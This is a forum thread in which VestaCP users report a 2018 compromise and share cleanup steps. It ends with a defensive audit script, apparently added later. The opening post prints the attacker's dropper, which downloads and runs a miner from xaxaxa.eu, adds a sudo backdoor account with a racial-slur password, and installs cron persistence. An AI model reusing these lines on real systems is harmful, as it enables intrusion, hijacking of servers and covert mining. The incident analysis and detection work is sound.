have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 12:43 am
by sauvegardezvous99
hello team,

Just hacked by a dumb hacker who uses xaxaxa.eu/* and some sh script.
I am currently investigating whether vesta was on release 22.

/tmp/load.sh

Code:
if pgrep -x "gcc" > /dev/null
then
    echo "Running"
else
    cd;
    pkill -f xmrig;
    wget -O /tmp/gcc http://xaxaxa.eu/gcc;
    chmod +x gcc;
    wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
    /tmp/gcc -c /tmp/config_1.json;
    echo "fucktheniggers" | sudo -S useradd sysroot;
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
    echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
    (crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
    /usr/local/vesta/bin/v-update-sys-vesta-all;
fi

/tmp/config_1.json

Code:
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-priority": null,
    "donate-level": 0,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool1.xaxaxa.eu:28000",
            "user": "lol",
            "pass": "lol",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "syslog": false,
    "threads": null
}

Some files have been altered. What do you need to know if your patch covers that attempt?

thank you ,

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 3:58 am
by ScIT
Can you send more information about the creation time of the files? The Vesta dev team has patched this issue with release 22; for further investigation we need to be sure that the infection was after the upgrade to 22.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:43 am
by aximus
I have the same problem.

Running:

Code:
apt-get update

and

Code:
apt-get install vesta

Gives me:

Code:
vesta is already the newest version (0.9.8-20)

But that's not the latest version, is it?

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:50 am
by Spheerys
I was hacked too by the same script.
To stop it quickly and dirty, I have mounted /tmp with the noexec parameter:

Code:
/dev/xvdc             /tmp                    ext4    loop,noexec,nosuid,nodev,rw  0 0

And edited my /etc/hosts like this:

Code:
127.0.0.1	bigbatman.loan xaxaxa.eu

but the malware is still there...

The files /tmp/load.sh and /tmp/gcc were owned by the admin user, the same one vestacp uses...

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:53 am
by ScIT
As you can read in the red banner in the forum, the newest version is 0.9.8-22. Please do:

Code:
apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all

This should update your system, normally also vesta. Additionally, we start the internal upgrade script from vestacp in the last part.

Then you can run this; when you get the same output, vesta is up to date:

Code:
# cd /usr/local/vesta/bin
# ./v-list-sys-vesta-updates
PKG          VER    REL  ARCH   UPDT  DATE
---          ---    ---  ----   ----  ----
vesta        0.9.8  22   amd64  yes   2018-06-25
vesta-php    0.9.8  21   amd64  yes   2018-05-17
vesta-nginx  0.9.8  21   amd64  yes   2018-05-17

Based on the information I have and see, it is normal that the vesta-php and vesta-nginx packages are on release 21.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 6:54 am
by ScIT
Spheerys wrote:
Tue Jun 26, 2018 6:50 am
I was hacked too by the same script.
To stop it quickly and dirty, I have mounted /tmp with the noexec parameter:

Code:
/dev/xvdc             /tmp                    ext4    loop,noexec,nosuid,nodev,rw  0 0

And edited my /etc/hosts like this:

Code:
127.0.0.1	bigbatman.loan xaxaxa.eu

but the malware is still there...

Based on that, we try to answer the question "is the patch working": did you upgrade to the actual release?

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:00 am
by Spheerys
I did the recommended upgrade but the malware is still present.
It inserts a file at /etc/cron/d/php5 with this content:

Code:
29 */3 * * * root [ -x /usr/lib/php5/sessionclean ] && /usr/lib/php5/sessionclean

And /usr/lib/php5/sessionclean is:

Code:
#!/bin/sh -e
#
# sessionclean - a script to cleanup stale PHP sessions
#
# Copyright 2013-2015 Ondřej Surý <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

SAPIS="apache2:apache2 apache2filter:apache2 cgi:php5 fpm:php5-fpm cli:php5"

# Iterate through all web SAPIs
(
proc_names=""
for sapi in ${SAPIS}; do
    conf_dir=${sapi%%:*}
    proc_name=${sapi##*:}
    if [ -e /etc/php5/${conf_dir}/php.ini ]; then
        # Get all session variables once so we don't need to start PHP to get each config option
        session_config=$(PHP_INI_SCAN_DIR=/etc/php5/${conf_dir}/conf.d/ php5 -c /etc/php5/${conf_dir}/php.ini -d "error_reporting='~E_ALL'" -r 'foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";')
        save_handler=$(echo "$session_config" | sed -ne 's/^session\.save_handler=\(.*\)$/\1/p')
        save_path=$(echo "$session_config" | sed -ne 's/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p')
        gc_maxlifetime=$(($(echo "$session_config" | sed -ne 's/^session\.gc_maxlifetime=\(.*\)$/\1/p')/60))

        if [ "$save_handler" = "files" -a -d "$save_path" ]; then
            proc_names="$proc_names $proc_name";
            printf "%s:%s\n" "$save_path" "$gc_maxlifetime"
        fi
    fi
done
# first find all open session files and touch them (hope it's not massive amount of files)
for pid in $(pidof $proc_names); do
    find "/proc/$pid/fd" -ignore_readdir_race -lname "$save_path/sess_\*" -exec touch -c {} \; 2>/dev/null
done
) | sort -rn -t: -k2,2 | sort -u -t: -k 1,1 | while IFS=: read -r save_path gc_maxlifetime; do
    # find all files older then maxlifetime and delete them
    find -O3 "$save_path/" -ignore_readdir_race -depth -mindepth 1 -name 'sess_*' -type f -cmin "+$gc_maxlifetime" -delete
done

exit 0

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:02 am
by ScIT
The upgrade does NOT remove the infection. If you are infected, you have to remove it manually. The upgrade "only" fixes the security issue that can cause an infection.

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:08 am
by Spheerys
OK thanks.
I will document what I found to help others with the cleaning...

Re: have been HACKED ! by xaxaxa.eu

Posted: Tue Jun 26, 2018 7:21 am
by Spheerys
Tutorial to stop the attack
It's not bulletproof and written quickly and dirty: just cleaning what I have found, and you may have to adapt it.

First, upgrade your system and VestaCP :

Code:
apt-get update && apt-get upgrade -y
cd /usr/local/vesta/bin
./v-update-sys-vesta-all

Look at this file or a similar one: /etc/cron/d/php5
If you are sure of what you are doing, delete it.

Edit /usr/local/vesta/data/users/admin/cron.conf and remove the last lines about the malware.
Rebuild the vestacp cron of the admin user: v-rebuild-cron-jobs admin restart

Remove the latest lines of those files (the ones talking about the sysroot account):
  • /etc/passwd
  • /etc/group
  • /etc/gshadow
  • /etc/subuid
  • /etc/shadow
  • /etc/sudoers (several lines!!!)

Useful tips:
- you can mount the /tmp partition with the noexec parameter to avoid script execution.
- you can edit your /etc/hosts file to avoid the connections to the remote malware scripts
- command to find the files modified during the last 600 minutes: find /usr/ -cmin -600
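The cleanup steps above are a manual checklist; the following audit script turns them into repeatable checks. It is an added example written for this thread, not code from any poster or from VestaCP. The indicators it looks for (the xaxaxa.eu and bigbatman.loan hostnames, the /tmp/gcc, /tmp/load.sh and /tmp/config_1.json files, the sysroot account and its sudoers grant, the @reboot crontab entry, the admin cron.conf) are all taken from the posts in this thread; the default paths /etc/cron.d, /etc/sudoers and the vesta data directory, and the choice to check the root and admin crontabs, are assumptions. Each scan_* function prints its findings and returns 1 when it found something, so the exit status of a full run can drive an alert. One caveat a practitioner should know: on Debian and Ubuntu the php5-common package itself ships /etc/cron.d/php5 and /usr/lib/php5/sessionclean, so the script only flags that cron file when it contains the indicators above rather than treating its presence as proof of infection.

```shell
#!/bin/sh
# Added example for this thread (not code from any poster or from VestaCP):
# audit a host for the indicators described in the posts above. Every path
# is a parameter with a default, so the checks run against the live system
# or against a mounted copy of a compromised box. Each scan_* function prints
# its findings and returns 1 when it found the indicator, 0 otherwise.

# Indicators taken from the thread (assumed to be the complete set).
IOC_HOSTS='xaxaxa\.eu|bigbatman\.loan'
IOC_PATHS='/tmp/gcc|/tmp/load\.sh|/tmp/config_1\.json'
IOC_USER='sysroot'

# Crontab text (crontab -l output, a vesta cron.conf, or a cron.d file)
# referencing the miner, the dropper, or its download/pool hosts.
scan_cron_text() {                     # $1 = file holding crontab lines
    if grep -Eq "$IOC_PATHS|$IOC_HOSTS" "$1" 2>/dev/null; then
        echo "FINDING: cron entry referencing miner/dropper in $1"
        grep -En "$IOC_PATHS|$IOC_HOSTS" "$1"
        return 1
    fi
    return 0
}

# passwd/shadow/group/gshadow/subuid-style database: an entry for the rogue account.
scan_account_db() {                    # $1 = database file
    if grep -Eq "^$IOC_USER:" "$1" 2>/dev/null; then
        echo "FINDING: account '$IOC_USER' present in $1"
        return 1
    fi
    return 0
}

# sudoers: the appended grant. The dropper appends it on every run (the
# thread notes "several lines"), so the count hints at how often it ran.
scan_sudoers() {                       # $1 = sudoers file
    n=$(grep -Ec "^[[:space:]]*$IOC_USER[[:space:]]+ALL" "$1" 2>/dev/null || true)
    if [ "${n:-0}" -gt 0 ]; then
        echo "FINDING: $n sudo grant(s) for '$IOC_USER' in $1"
        return 1
    fi
    return 0
}

# Dropped files in the temp dir. The owner is reported because the posts
# observed the files belonged to the vesta 'admin' user, which points at the
# panel as the entry point.
scan_dropped_files() {                 # $1 = temp dir (e.g. /tmp)
    found=0
    for name in gcc load.sh config_1.json; do
        f="$1/$name"
        if [ -e "$f" ]; then
            echo "FINDING: dropped file $f owned by $(ls -ld "$f" | awk '{print $3}')"
            found=1
        fi
    done
    return $found
}

# The miner binary is renamed 'gcc', so match on its command line, not its name.
scan_processes() {
    if pgrep -f 'gcc -c /tmp/config_1\.json' >/dev/null 2>&1; then
        echo "FINDING: miner process running under the name 'gcc'"
        return 1
    fi
    return 0
}

audit_host() {                         # $1 = filesystem root to audit ("" = live system)
    root=${1:-}
    rc=0
    tmpf=$(mktemp) || return 2
    for u in root admin; do            # 'admin' is the vesta panel user
        if crontab -l -u "$u" > "$tmpf" 2>/dev/null; then
            scan_cron_text "$tmpf" || rc=1
        fi
    done
    rm -f "$tmpf"
    scan_cron_text "$root/usr/local/vesta/data/users/admin/cron.conf" || rc=1
    # php5-common legitimately ships /etc/cron.d/php5; only its content counts.
    scan_cron_text "$root/etc/cron.d/php5" || rc=1
    for db in passwd shadow group gshadow subuid; do
        scan_account_db "$root/etc/$db" || rc=1
    done
    scan_sudoers "$root/etc/sudoers" || rc=1
    scan_dropped_files "$root/tmp" || rc=1
    if [ -z "$root" ]; then scan_processes || rc=1; fi
    return $rc
}

# Run the live audit only when asked, so sourcing the file just loads the functions:
#   sh audit_xaxaxa.sh --run              (live system, as root)
#   sh audit_xaxaxa.sh --run /mnt/image   (mounted copy; process check skipped)
if [ "${1:-}" = "--run" ]; then
    audit_host "${2:-}"
    exit $?
fi
```

A non-zero exit from `audit_host` means at least one indicator was found; running it again after the manual cleanup in the post above, and once more after a reboot (the @reboot crontab entry and the cron.d file are the persistence points), is a cheap way to confirm the host is actually clean rather than assuming the upgrade removed anything.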